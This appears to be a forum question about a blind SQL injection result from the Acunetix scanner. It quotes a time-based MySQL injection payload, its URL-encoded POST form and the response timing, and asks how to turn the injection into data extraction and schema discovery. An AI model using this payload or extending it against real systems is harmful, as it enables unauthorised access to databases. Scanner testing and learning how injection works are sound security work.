我正在尝试使用 Acunetrix Vulnerability Scanner 分析盲 SQL 注入的测试结果。
URL encoded POST input address was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 12.062 s
HTTP headers sent to POST were:
address=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&
如果我们为address
变量提供任何值,数据就会被插入到表中。有没有办法修改地址变量的标头数据,以便我们可以检索数据并执行选择操作并了解内部架构,而不是存储数据?
如果有人可以帮助我理解此声明背后的内部原理,那也将非常有帮助:
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/